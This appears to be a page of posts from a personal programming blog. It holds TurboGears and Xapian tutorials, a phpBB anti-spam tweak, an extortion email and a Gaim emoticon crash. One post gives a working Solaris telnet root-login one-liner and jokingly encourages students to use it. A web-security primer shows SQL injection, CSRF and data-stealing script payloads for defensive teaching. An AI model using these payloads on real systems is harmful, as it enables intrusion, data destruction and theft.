Feed on
Posts
Comments

Reported by Boris.

Back in December I’ve posted about the technique I use to stop spam on phpBB forums. The following enhancement of this idea appeared today on xkcd webcomic blog:

A new CAPTCH approach

But it would not work, because even spambots cry at that.

It is very common to hear stories in which criminals ask restaurant or shop owners to pay them money for the criminal’s “protection services”. Those who dare not to pay them, usually sorry for that few days after, when they find their business burning in flames.

Well, it seems that this phenomenon is now spreading in the blogosphere, as ShoeMoney, one of my favorite bloggers, received a letter asking him to pay protection money for protecting his Adsense income:

Subject: Alarm
From: “dragon dragon”
Date: Wed, March 7, 2007 1:05 pm
To: jeremy@shoemoney.com
————————————————————————–

This is a warning and if you don’t pay attention to it you will suffer from bad turns.
All your income is through Google Adsense and if you do not cooperate with us we will stop this income source. We would like you to pay us the total amount of USD 200 each month. This small amount could be considered as nothing compared to your earnings from Adsense. If you do not pay this amount we will have to close your account by the help of special robots and …! I am not happy to do this but I have to as there is no way out of it and I trust if you were me you would also have to do the same. I am an inventor and I have recently innovated a new design which will be accepted by scientific societies only if I can present a model in advance; and making the model takes money. They will register my new design only after they have checked all aspects of the same. My theory is changing the power into energy. If I succeed many big problems will be solved. All my design specification could be viewed in the following web log:

magnetic-machine.blogspot dot com

The magnets will be bought in installments and the amount you pay is to be paid monthly for the same. After the registration of my design, the entire amount which I received from you will be paid back.

If you collaborate with me, you have helped to the science. And if not, I will have to close your Google AdSense account. I seek your help for the sake of the Science and if you are not prepared to collaborate I will have to close your Google AdSense account

Oh well, at least he promises to pay the money back later.

It will probably be hard for you to believe, but my girlfriend discovered a DoS vulnerability in Gaim. No, don’t worry. She is not a computer geek (One in a relationship is certainly enough). The story of my girlfriend’s important discovery goes like this:

I was chatting with her some days ago using Gaim (she uses MS Messenger). At some point, she had sent me the following attack vector:

:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(
:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(
:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(
:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(
:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(

As she deeply disliked something I had said to her …

Gaim replaced each “:(” with a sad animated :( emoticon. From a mysterious reason, a few dozens of sad emoticons made Gaim choke. CPU usage was at 100% and the system felt highly unresponsive. It was impossible to use Gaim at all.

Luckily, I was able to kill Gaim from the command-line. I started it again hoping for the best, however, when I opened the chat window again, the attack vector was still there (retrieved from the logs) and Gaim choked yet again. I had to manually remove the few last lines from the log files, so I’ll be able to speak with her again.

To make a long story short, my girlfriend is now happy again.

Note: This episode of Thesamet.com was recorded 10 days ago, when Gaim developers were notified of this.

Clarification: For some reason, some people consider this to be a chauvinistic post. My girlfriend is a very intelligent person, she is not interested in software security. We were both surprised that she unintentionally discovered this. That’s it.

P.S.: The first paragraph of this post was written by her. She said it will help it to “do well on digg”.

This is the second installment of the lecture I gave at the Israeli Pythoneers Meeting. In case that you missed it, it is recommended that you read the first part of it.

At this point, I closed OpenOffice Impress and said that I would demonstrate how quickly you could get a functional Web application up and running with TurboGears.

Setting Things Up

I’ve quick-started a new project called TurboGallery…

$ tg-admin quickstart
Enter project name: TurboGallery
Enter package name [turbogallery]: <Enter>
Do you need Identity (usernames/passwords) in this project? [no] <Enter>

…and gone inside its directory to run it:

$ cd TurboGallery
$ python start-turbogallery.py


I started Firefox and browsed to http://localhost:8080. “There is already something to see on the site,” I said. The TurboGears’ default welcome page was showing up.

“The next thing I always do is to delete the entire body of the welcome template.” So, I opened welcome.kid in my favorite text editor and did just that. I then refreshed the page in Firefox. All the contents were gone except for the TurboGears’ header and the footer, which said, “TurboGears under the hood.” Someone asked if there was any way to remove those two remaining items. “Absolutely,” I said. It was time to mention master.kid. I opened the file and explained that it is used to render the layout that is common to all pages. As such, you do not have to duplicate it in all your templates. I next removed the TurboGears’ footer but left the header in its place.

I then opened model.py and added a class that would represent a single photo:

from datetime import datetime

class Photo(SQLObject):
    title = UnicodeCol()
    date = DateTimeCol(default=datetime.now)
    image = BLOBCol()
    thumbnail = BLOBCol()

A photo will have a title and a date field, which indicates the time it was uploaded. The field’s default argument makes the date of a newly created photo object be the current date. That way, you don’t need to specify this information every time you create a new photo. In the above definition, we don’t give the date field the current time. Rather, we give it a function that returns the current time. Whenever a photo is created, this function will be called to determine the value for this field. We store the images inside the database together with a thumbnail. BLOB stands for binary large object. The thumbnail part was not actually used in the tutorial.

Next, I created a database with

$ tg-admin sql create

I was then asked how TurboGears knows where and how to access the database. I replied that the default TurboGears’ setting uses SQLite, which creates a database-in-a-file. It is very convenient to have your database readily available as a normal file while your project is in its development and testing phases.

To save time, I have prepared in advance a database that contains four photos. I replaced the database file that was just created with my copy. The next thing to do will be to display the photos on the main page. I modified the index() method into…

@expose(template="turbogallery.templates.welcome")
def index(self):
    photos = Photo.select()
    return dict(photos=photos)

…and uncommented the “from model import *” line. The index() method is called whenever the front page of the Web site is viewed. I explained the expose() decorator, which makes a method available to the outside world. Without it, the method could not be accessed from the Web. The template argument specifies which template should be used to render the page.

The index() method gets a list of all photos from the database and returns it inside a dictionary. TurboGears passes this dictionary to the template. I then moved back to welcome.kid and added the following to the body:

<ul>
     <li py:for="photo in photos">${photo.title}</li>
</ul>
<hr/>

I refreshed the page, and the list of photos was displayed. It is educational to view the source of the resulting page, but the people who were listening to my lecture wanted to see the photos straightaway.

Seeing Some Photos

To see the photos, we’ll have to add an IMG element to the list. The IMG element will get the photo file from another URL. I’ve changed the welcome.kid list into…

<ul class="photo_list">
    <li py:for="photo in photos">
        <img src="/images/${photo.id}"
              id="image${photo.id}" width="160"/>
<br/>
        <a href="/photo_info/${photo.id}">${photo.title}</a>
    </li>
</ul>
<hr/>

…and then added the following photo_info() method to the controller:

@expose()
def images(self, photo_id):
    return "Hello "+photo_id

I next browsed to /images/world, and the browser displayed “Hello world.” The goal of this step was to demonstrate to the audience how TurboGears (CherryPy) maps URLs to methods. It was also intended to illustrate how easily a part of the URL can be transformed into positional arguments.
The right thing to put in this function would be a query that would obtain the photo from the database and return the associated jpeg file. Here is the code:

    @expose(content_type=‘image/jpeg’)
    def images(self, photo_id):
        photo = Photo.get(photo_id)
        return photo.image

I refreshed the page, and the photos I’d prepared were now showing. (I also changed the CSS file when no one was looking to have this layout.)
Evangalizing Firefox in Thailand
In the second picture, you can see me evangelizing for the use of Firefox in Thailand.
Since this is just an example application to make things simple, the image is sent in full size and is resized by the browser.
Clicking on the caption below the images sends us to a page we haven’t yet created. This page will display the photo in full size together with some statistics on it. I saved welcome.kid as photo_info.kid and changed the body contents to:

    <h1>Photo Details for "${photo.title}"

    <img id="image${photo.id}" src="/images/${photo.id}"/>

    <ul>
        <li>Image size: ${len(photo.image)} bytes</li>
        <li>Uploaded at: ${photo.date}</li>
    </ul>

The corresponding method in controllers.py() would be:

    @expose(template="turbogallery.templates.photo_info")
    def photo_info(self, photo_id):
        photo = Photo.get(photo_id)
        return dict(photo=photo)

Share Your Photos

An online gallery application is quite useless if its users can’t upload photos from their own computers. As such, we need to create an image upload form. In TurboGears, creating forms and validating user input is very easy. I’ve added a form definition to the top of controllers.py. The first part defines the fields:

from turbogears.widgets import *
from turbogears import *

class AddPhotoFields(WidgetsList):
    title = TextField(label=‘Title:’)
    image = FileField(label=‘Photo:’)

The form will have a text input field for the title of the photo as well as a field that enables the selection of an image file from the user’s computer. The second part of the definition is the validation schema for this form:

class AddPhotoSchema(validators.Schema):
    title = validators.String(not_empty=True, max=16)

“The touchiest issue with any Web application is its users,” I said. “Without them, there is no need to worry about bugs or invalid input.” The validation makes sure the input your Web application receives is a sound one. In many cases, further validation is needed. The above validator makes sure the title is not empty and is no longer than 16 letters. One audience member asked if the validation can be specified inside the fields definition. Yes, it is possible to specify a validator as a keyword argument to a field definition, but making the validation schema exterior to the fields definition renders it possible to define a more complex schema that involves field dependency or logical operators. A common instance where such a schema is useful is in the validation of a registration form, where you have to check whether or not the entered password field text and the “reenter password field” match.

The last part of the form definition ties the previous two parts together, with text for the submit button and a URL that will handle the form data:

add_photo_form = TableForm(fields=AddPhotoFields(),
        validator=AddPhotoSchema(),
        submit_text=‘Upload!’,
        action=‘/upload’,
        )

I’ve created a template named add.kid that will display just the form:

   <h1>Add New Photo</h1>
    ${form()}

I’ve also added a controller method to make this page accessible…

    @expose(template="turbogallery.templates.add")
    def add(self):
        return dict(form=add_photo_form)

…and I’ve linked to it from welcome.kid.

Here is a screenshot of this page:
Add photo form
As you can see, TurboGears gives us a nice form without us having to type in any HTML at all. Clicking the Upload! Button posts the data to the /upload URL. To test the form, I’ve added the corresponding method to the controller:

    @expose()
    @validate(form=add_photo_form)
    @error_handler(add)
    def upload(self, title, image):
        return "hi"

The decorators that are attached to this method make TurboGears validate its input using the add_photo_form. If a validation error occurs, the response is handled by the add() method, which just displays the form again along with the validation errors. So if, for example, we type in a too-long title, we will get the following:
TurboGears form validation errors
I would now really like to make the method save the image in a new photo object. The following code will do:

    @expose()
    @validate(form=add_photo_form)
    @error_handler(add)
    def upload(self, title, image):
        image = image.file.read()
        Photo(title=title, image=image, thumbnail=None)
        flash("Image successfully added!")
        raise redirect(‘/’)

Yes, handling a file upload in TurboGears is just a matter of reading from a file-like object. It is that simple. The next line creates a photo object with the title and the image data. The flash() method makes the given message appear on the next page, and we redirect to the main page. I filled out the form to upload an image that was downloaded from my camera. Here’s what I got:
Rotate photos in TurboGears
Damn! I hate it when my camera decides to rotate an image that has already been uploaded. So, let’s add an AJAX image-rotation tool. A click on the rotate link will rotate the image in place without requiring the entire page to be reloaded. We first add a method to rotate the image to our controller:

    @expose(‘json’)
    def rotate(self, photo_id):
        import Image
        from cStringIO import StringIO
        photo = Photo.get(photo_id)
        image = Image.open(StringIO(photo.image))
        rotated = image.rotate(90)
        photo.image = rotated.tostring(‘jpeg’, ‘RGB’)
        return dict(photo_id=photo_id, size=rotated.size)

The method uses PIL – Python Imaging Library. It loads the image from the database, rotates it, and then stores it again in the database. The method returns a dictionary containing the photo_id and the new photo dimensions. It is set to return the data in JSON format, which makes it extremely easy to use in Javascript. I directly entered http://localhost:8080/rotate/2 to show what the JSON object looks like. I then refreshed the main page to verify that the photo had been rotated. Next, I rotated it three more times until it was straight again.

I then went back to welcome.kid and added a rotate link for each photo:

<ul class="photo_list">
    <li py:for="photo in photos">
        <img src="/images/${photo.id}"
              id="image${photo.id}" width="160"/>
<br/>
        <a href="/photo_info/${photo.id}">${photo.title}</a>
        <a href="#" onclick="rotate_photo(${photo.id}); return false;">(rotate)</a>
    </li>
</ul>

Clicking on the “rotate” text located next to a photo will call a Javascript function that receives the corresponding photo ID. I’ve added the implementation of rotate_photo() to the top of the welcome.kid template. It uses MochiKit, which must be enabled in config/app.cfg (it is explained how to do so in that file).

<script type="text/javascript">
    function rotate_photo(photo_id) {
        d = loadJSONDoc(‘/rotate/’+photo_id);
        d.addCallback(update);
    }

    function update(r) {
       $(‘image’+r.photo_id).src=‘/images/’+(r.photo_id)+‘?random=’+Math.random();
    }
</script>

The function makes an asynchronous call to the rotate URL, providing it with the photo ID. Once the response arrives, update() is called and is provided with the JSON object we returned from the controller’s rotate() method. In Javascript, you can use dot notation to access the keys in that dictionary. When update() is called, the image has already been rotated at the server. Therefore it is the right time for the browser to fetch it again. To perform this re-fetching, update() sets the image src attribute to the image URL, but in order to prevent the browser from displaying the cached old image, we add a random argument to the URL. You can see a related post describing how to prevent browsers from caching. To make the image() controller method accept this argument and ignore it, its definition becomes:

def images(self, photo_id, random=None):

I then refreshed the main page and rotated the photos a few times to demonstrate how slick this functionality is (especially when you’re working on the server). You can see it in the video below:

Next, I uploaded another image I had prepared in advance, this one called questions.jpg, using the upload form. Here it is:

It says “Questions?” in Hebrew, signifying that the lecture was over and it was time to ask questions.

Download the full source code of TurboGallery.

If you happen to find a Sun Solaris server with a telnet daemon running, it is very likely that you can get superuser access on it by just typing:

$ telnet -l "-froot" server

where server is the server name. I was able to confirm this on a Solaris server nearby.

It’s amazing to see that this one was overlooked for SO much time, and how using this exploit does not require any skill whatsoever. If root logins through telnet are disabled, you may still be able to login as any other user (think sysadmin’s user account + keystroke recorder)

While the telnet port is usually blocked to servers on the internet, it is quite common that it is left open inside local networks, and especially in universities. So go ahead and look for Solaris rootkits — the exam period is just over the corner :)

Source: Errata Security blog.

One month ago, I gave an introductory speech about TurboGears at the Israeli Pythoneers Meeting. The discussion consisted of two parts. The first part introduced TurboGears, and the second part included live coding of a Flickr clone.


I hereby give the lecture again, in a written format. These are the original slides used in the lecture. Click on a slide to enlarge it.

Continue Reading »

Needle SmallWhat good is an application—not matter how much information it contains—if the inability to easily search it renders it useless?

Xapian to the Rescue

Xapian is an excellent open source (GPL) search engine library. It is written in C++ and comes with bindings for Python as well as many other languages, and it supports everything you’d expect from a modern search engine:

  • Ranked probabilistic search – The results that are returned are ranked according to their relevancy, with the most relevant occurring first.
  • Boolean search operators – You can use AND, OR, NOT, XOR in your searches.
  • Phrase and proximity searching – For example, “used books” will look for occurrences of these words as an exact phrase, but you can also search for “used NEAR books” to find occurrences of the words “used” and “books” that are within 10 words of each other. You can even write “used NEAR/3 books” to change the proximity threshold to three
  • Stemming of search terms – If, for example, you search for “programmer,” you can find articles that mention “programmers” or “programming.” Xapian currently supports stemming in Danish, Dutch, English, Finnish, French, German, Italian, Norwegian, Portuguese, Russian, Spanish, and Swedish
  • Stopwords – Xapian already knows which common words to ignore (like ‘are,’ ‘is,’ and ‘being’)
  • Simultaneous update and searching – Xapian allows to index new articles while the database is being searched. New articles can be searched right away.
  • Relevant Suggestions – Xapian can automatically suggest documents that are relevant to a given document. As such, you can add a list of “similar items” to each page.
  • Value-associated results – You can associate values like word-count, date, page views, diggs, and so on with each document. Xapian can return results that are sorted by any of these criteria
  • Document metadata – You can add metadata tags to each document (Xapian calls these terms). These tags can be anything you desire, like author, title, date, tags, and so on. Users can then search within the metadata by typing “author:john”.

Xapian diagram medium

The above diagram shows the main participants in a typical search-enabled use case. We assume that the data to be searched is stored in a relational database (the blue SQL server jar), but it doesn’t really matter where the data comes from. The indexer is a Python program that is executed periodically (as a cron job). Its function is to retrieve new or changed documents from the database and to index them. The Xapian library handles the actual read/write operations on the Xapian database (in the purple jar).

Since the Xapian library is not thread-safe and because Web applications are usually multithreaded, you need to implement a locking mechanism if you want access to a Xapian database to be safe. My preferred way for accomplishing this aim is to use a separate process (the orange Search Server box). This process will be a single-threaded RPC server that will handle all searches. The benefit of this strategy is that you can move the search server process (together with the Xapian database) to a different machine. In so doing, you can free up a lot of the resources on that server that runs your application. That makes the system very scalable. In general, you can expect any bottlenecks to be more IO and memory related than CPU related.

Alternatively, your search operations can be directly initiated from your application process. This alternative will work as long as you use a mutex to govern access to your database. However, I wouldn’t recommend doing this in a production environment. Why? Because you’ll never be sure what’s consuming so much memory—the Xapian library or your application.

The application (red box) gets a very clean search API. It simply connects to the XML RPC server (one line of code) and obtains access to a search() method which gets the search query and how many results are needed as arguments. It then returns a dictionary with the total number of available results and the results themselves.

In this tutorial, we’ll create a searchable article database. We assume that you already have Xapian and the Xapian bindings installed. We’ll start with the indexer.

The Indexer: The Golden Retriever

Golden Document RetrieverFollowing is the indexer code. It is tailored to TurboGears and SQLAlchemy, but it can be easily adapted to suit any ORM. It accepts three command line arguments: the configuration file, which helps it find the database (either dev.cfg or prod.cfg); the Xapian database location, which is simply a directory name; and a number of hours (such that all documents that were created or modified within this number of hours will be indexed). If you run the indexer every hour, you can safely give 2 as the third argument. If you’d like to re-index all articles, pass in 0 as the third argument.

#!/usr/bin/env python
from datetime import *
import xapian

WORD_RE = re.compile(r"\\w{1,32}", re.U)
ARTICLE_ID = 0

stemmer = xapian.Stem("en") # english stemmer

def create_document(article):
    """Gets an article object and returns
    a Xapian document representing it and
    a unique article identifier."
""

    doc = xapian.Document()
    text = article.text.encode("utf8")

    # go word by word, stem it and add to the
    # document.
    for index, term in enumerate(WORD_RE.finditer(text)):
        doc.add_posting(
          stemmer.stem_word(term.group()),
          index)
    doc.add_term("A"+article.submitted_by.user_name)
    doc.add_term("S"+article.subject.encode("utf8"))
    article_id_term = ‘I’+str(article.article_id)
    doc.add_term(article_id_term)
    doc.add_value(ARTICLE_ID, str(article.article_id))
    return doc, article_id_term

def index(db, period):
    """Index all articles that were modified
    in the last <period> hours into the given
    Xapian database"
""

    if period:
        start = datetime.now()-timedelta(hours=period)
        query = (Article.q.last_modified>start)
    else:
        query = None
    articles = session.query(Article).select(
       query)

    for article in articles:
        doc, id_term = create_document(article)
       db.replace_document(id_term, doc)

if __name__=="__main__":
    configfile, dbpath, period = sys.argv[1:]
     turbogears.update_config(configfile=configfile,
        modulename="myproject.config")
    from myproject.model import *
    turbogears.database.bind_meta_data()
    db = xapian.WritableDatabase(dbpath,
        xapian.DB_CREATE_OR_OPEN)
        index(db, int(period))

All strings that are passed to Xapian functions must be encoded in UTF-8. The create_document() function splits the article’s text into words, stems them, and then adds them one by one to the Xapian document. Next, a term with the username of the article’s author, prefixed by the letter ‘A,’ and the article’s subject, prefixed by the letter ‘S’ is added. Xapian gives special treatment to the first character of each term (i.e., it gives the terms its meaning). You’ll see how we use these terms when we code the search server.

Another term, this one prefixed by the letter ‘I’,’ is now added to render a unique article ID. The article ID is also assigned to the document as a value. This number relates a Xapian document to its authentic source in the SQL server.

The index() method function simply selects the relevant articles and builds a Xapian document object for them. Instead of using add_document(), which can cause an article to be indexed multiple times in the database, we use replace_document(), which is given a unique term. If a document is already indexed by the given term, it will be replaced with the given document; otherwise, a new document will be added to the database.

After the data is indexed, it is time to make it searchable.

The Search Server: Seeing Results

The role of the search server is to obtain queries from the application and to then return results. As we strive for a single-threaded implementation, the Twisted framework makes it extremely easy to write the code for this server. If you are not familiar with Twisted or XML RPC, don’t worry; just imagine we’re writing a controller with only one method exposed: xmlrpc_search().

import xapian

from twisted.web import xmlrpc, server
from twisted.internet import reactor, task
from time import time
from indexer import ARTICLE_ID

DEFAULT_SEARCH_FLAGS = (
        xapian.QueryParser.FLAG_BOOLEAN |
        xapian.QueryParser.FLAG_PHRASE |
        xapian.QueryParser.FLAG_LOVEHATE |
        xapian.QueryParser.FLAG_BOOLEAN_ANY_CASE
        )

class SearchServer(xmlrpc.XMLRPC):
    def __init__(self, db):
        xmlrpc.XMLRPC.__init__(self)
        self.db = xapian.Database(db)
        self.parser = xapian.QueryParser()
        self.parser.add_prefix("author", "A")
        self.parser.add_prefix("subject", "S")
        self.parser.set_stemmer(xapian.Stem("en"))
        self.parser.set_stemming_strategy(xapian.QueryParser.STEM_SOME)

        # make sure database is reloaded every 10 minutes
        lc = task.LoopingCall(self.reopen_db)
        lc.start(600)

    def reopen_db(self):
        try:
            self.db.reopen()
        except IOError:
            print "Unable to open database"

    def xmlrpc_search(self, query, offset, count):
        """Search the database for <query>, return
        results[offest:offset+count], sorted by relevancy"
""

        query = self.parser.parse_query(query.encode("utf8"),
                DEFAULT_SEARCH_FLAGS)
        enquire = xapian.Enquire(self.db)
        enquire.set_query(query)
        try:
            mset = enquire.get_mset(offset, count)
        except IOError, e:
            if "DatabaseModifiedError" in str(e):
                self.reopen_db()
            raise

        results = []
        for m in mset:
            results.append(
                {"percent": m[xapian.MSET_PERCENT],
                "article_id": m[xapian.MSET_DOCUMENT].get_value(ARTICLE_ID)})
        return {"count": mset.get_matches_upper_bound(), "results": results}
import sys

if len(sys.argv)!=3:
    print "Usage: search.py <port> <db>"
    sys.exit(1)

reactor.listenTCP(int(sys.argv[1]), server.Site(SearchServer(sys.argv[2])))
reactor.run()

The search server constructor opens a database and initializes a query parser. We tell the query parser that the keyword ‘author’ refers to terms that are prefixed with the letter ‘A’ and that the keyword ’subject’ refers to terms that are prefixed with the letter ‘S.’ This specification makes it possible to search for “author:john” or “subject:xapian.”

We then instruct Twisted to call reopen_db() every ten minutes. This reopening renders the latest changes in the database available to the search server. Each time Xapian’s library opens the database, it works against a fixed revision of it.

The xmlrpc_search() is the only method that is exposed (since its name is prefixed by xmlrpc_). The offset (zero-based) and limit arguments allow for an efficient way to split the search results into several pages. The call returns a dictionary with the total number of available results and a list with the selected subset of results. Each item in the list contains a unique article_id and a percent, which indicates each document’s relevancy score.

The program receives the port number to listen on and the Xapian database path. Unless you’d like to expose your search functionality to the world, it is suggested that you block outside access to this port.

By now, you’re probably eager to try searching your own database. Here’s a quick way to do so. First, start the search server:

$ python search.py 3000 ./my_database

From another terminal, start a Python shell:

>>> import xmlrpclib
>>> s = xmlrpclib.Server(‘http://localhost:3000′)
>>> s.search(‘python -snake’, 0, 10)
{‘count’: 2, ‘results’: [{‘percent’: 94, ‘article_id’: 15}, {‘percent’: 79, ‘article_id’: 6}]}

In the same manner, you can use the search server from your application.

Working with Smaller Databases

Search engines are optimized to return results that are sorted according to their relevancy. If you need your results sorted by another criterion, such as date or diggs, it might be useful to run the query over a smaller database. For example, you might try running it over a database that contains only articles from the previous month. This strategy can significantly increase your overall performance.

Alternatives to Xapian

While I haven’t tried working with search engines libraries other than Xapian, you can try the Java-based Lucene which can be accessed from Python using PyLucene. The TurboLucene library eases using PyLucene from TurboGears.

Computer SecurityArm yourself and prepare for battle! This post is intended as a reminder about the possible security attacks your Web application may be vulnerable to. While it is not meant as a comprehensive guide to Web-application security, it can give you some ideas on how to better protect your applications.

SQL Injection Attacks

The joy of using an ORM like SQLAlchemy or SQLObject—in addition to the benefit of not having to write a single SQL statement yourself—is its ability to protect you from SQL Injection attacks. Although this built-in security measure affords you protection, it is important to understand how SQL injection attacks work.

If an application contains code that looks like this…

def get_user(self):
    mysql.execute(
        "SELECT * FROM users WHERE user_id=’%s’" %
            cherrypy.request.cookies[‘user_id’].value)
    …

…then you are vulnerable to the stinging strikes of a malicious user. That’s because he or she can craft a cookie with the value of "someonebad';
TRUNCATE TABLE users; SELECT '"
. The SQL statement that will be executed will then be:

SELECT * FROM users WHERE user_id=’someonebad’;
     TRUNCATE TABLE users; SELECT

…which is not good, not good indeed!

To see just how bad the situation really is for our fellows in PHP land, have a look at these Google code search results, or for our little brothers in ASP land, have a look here. Please act responsibly and don’t hack into the sites listed there. :)

Luckily, ORMs escape all the strings we send to the database engine, and as a result, we are protected from this kind of harmful attack.

XSRF: Cross-Site Request Forgery

This exploit is very common in Web applications, especially in those that provide AJAX API. It is best to describe this type of attack with an example. Suppose that an imaginary project, TGBank (which is a Web interface for a bank), has a send_money() method:

    @expose()
    def send_money(self, to_whom, how_much):
        # validate that user has enough money
        transfer_money(
            from_user=identity.current.user.user_id,
            to_user=to_whom,
            amount=float(how_much))
        turbogears.redirect(‘/’)

The bank site using this application might contain a page with a “send money” form, where the user fills in information such as to whom he is transferring the money and how much money he is transferring. Everything’s find and dandy there. But what if the user is connected to the bank site, and in another browser tab, he is simultaneously browsing a malicious site, one that contains the following img tag?

<img src="http://www.tgbank.com/send_money?
       to_whom=thesamet&amp;how_much=0.04"
width="0">

Then the user’s browser will trigger that operation on behalf of the unsuspecting and innocent Web visitor. And because it’s such and inconsequential amount, he probably won’t even bother to check about those four cents.

Allowing only POST requests to go into send_money() will not help the matter. That’s because it is easy to send POST requests using Javascript. On the other hand, checking that the HTTP referrer header of the request is within one’s domain is too restrictive. That’s because many browsers often do not send this header.

A possible solution is to add a hidden field that only your application can generate and validate. For example, you might consider that the application will process the request only if received a query argument with the value of a sha1 digest of a string that is composed of the user id and a secret word. This string can be easily validated by your application, but it will be hard for a malicious site to generate.

Utterly Ridiculous!—More XSRF: Stealing Information with Scriptaculous

In addition to doing serious damage, this type of attack can be used to steal information. Suppose the bank application previously mentioned has a URL that returns Javascript code that defines a list with your monthly statement (list of expenses). It may be used on the bank site for doing client side sorting. A malicious site might contain something like this:

<script src="http://www.tgbank.com/monthly_statement.js" type="text/javascript"></script>
<script type="text/javascript">
    function send_data_to_the_criminal() {
        /* code that converts the statement
            object to string goes here */
        Ajax.Request(’/collect_other_people_data.php’,
                postBody=’data=’+statement;
    }
window.onload = send_data_to_the_criminal;
</script>

Here, that dastardly attacker placed code on his site, that executes the monthly statement script from the bank’s site. Once that script is executed, we have an object named statement containing a list of monthly expenses. Then, after the document finished loading, it is transmitted right into the waiting attacker’s hands.

Recently, an XSRF flaw was discovered (and fixed) in GMail. This vulnerability allowed an attacker to steal the user’s contact list precisely as just mentioned.

Assault–Take Two! XSS: Cross-Site Scripting

Cross-site scripting vulnerability occurs when a Web application generates output that contains user-supplied data without HTML encoding. For example, if we allow a post in a forum to contain HTML tags, then we can use KID to display it:

    <div>
        ${XML(forum_post.body)}
    </div>

Raising the ax yet again, a vile attacker can embed javascript code into his post. Then, when an innocent user visits the page, his or her browser runs the script, unbeknownst to him or her. This script can, for example, send the contents of the page back to the attacker. It might also post a comment to a blog, in the unsuspecting user’s name, or make new friends for him or her in MySpace.

If we do not use the XML() function in KID, then HTML entities are escaped and we are safe. The users will see just the script text and the browser will not interpret it as code. That said, if XML() is to be used, then it is suggested one check whether the string contains '<script' (case insensitive) before actually sending it. You should also beware of spaces between the script and its surrounding < and >, although I haven’t tested which browsers allow it. Note that most HTML elements allow attributes that can contain javascript code like onmouseover or onclick. The safest thing would be to escape all < to < (Python has a cgi.escape function for this). If HTML tags are to be allowed, then the application should carefully check that they contain only permitted attributes. Also the href attribute of <a> tag should be checked that it does not contain something like “javascript:do_something()”. That way, those malicious attackers can be forced to drop their weapons before they have time to draw them.

Now that you’ve learned how to preempt attacks before they strike, you’re well on your way to a more enjoyable Web application development experience. Comments and questions about the strategies outlined here are welcomed. We also encourage suggestions on how you’ve successful waged war against security attackers.

Sometimes Google does strange things.

I was told today that this blog shows up on the first page of search results for the term “בלוג” (which is blog spelled in Hebrew). Here is a screenshot for the lazy disbelievers (taken on December 23, 2006):

search results for בלוג in google

Hmm. I thought it should be hard to get on the front page of google for such a broad term. Especially, if you do nothing (intentionally, at least) to make it happen.

So at least for the time being, this blog receives tons of highly un-targeted traffic. Any ideas on how to monetize this? :)

I am running several phpBB-based forums, and they all started receiving serious amounts of spam recently. It seems that the spammers are now able to break the captcha in the registration and even pass the e-mail activation. I found a very simple solution for this. And from that moment on - the spam stopped.

The idea is to ask the spam bot a question which it does not expect, but it will be no problem for the users to answer. I’ve added to the registration form the question “How much is 5+2 ?”. Most of the new forum members were able to answer it on the first attempt. But spam bots had no clue.

So until someone bothers to write a spam bot specifically for my forums - I am okay. When it happens, I’ll just change the question. It can be many things: “What was the color of the white horse of Hammurabi?” or “How long did the six-day war lasted?” and so on. You got the point.

Here is how to do it.

In the template directory, edit profile_add_body.tpl, and add a new row the the form:

<tr>
    <td class="row1"><span class="gen">How much is 5+2 *</span></td>
    <td class="row2">
        <input type="text" class="post" style="width: 200px" name="math_question" size="6" maxlength="6" value="" />
    </td>
</tr>

Browse to the registration page on your forum to see that it looks right.

In includes/usercp_register.php, look around line 260, and add the condition that checks if the question was answered properly:

    else if ( $mode == ‘register’ )
    {
        if ( empty($username) || empty($new_password) || empty($password_confirm) || empty($email) )
        {
            $error = TRUE;
            $error_msg .= ( ( isset($error_msg) ) ? ‘<br />’ : ) . $lang[‘Fields_empty’];
        };

        if (!isset($_POST[‘math_question’]) || $_POST[‘math_question’] != ‘7′) {
            $error = TRUE;
            $error_msg .= (isset($error_msg) ? ‘<br/>’ : ) . "Incorrect answer to the mathematical question…";
        }
    }

« Newer Posts - Older Posts »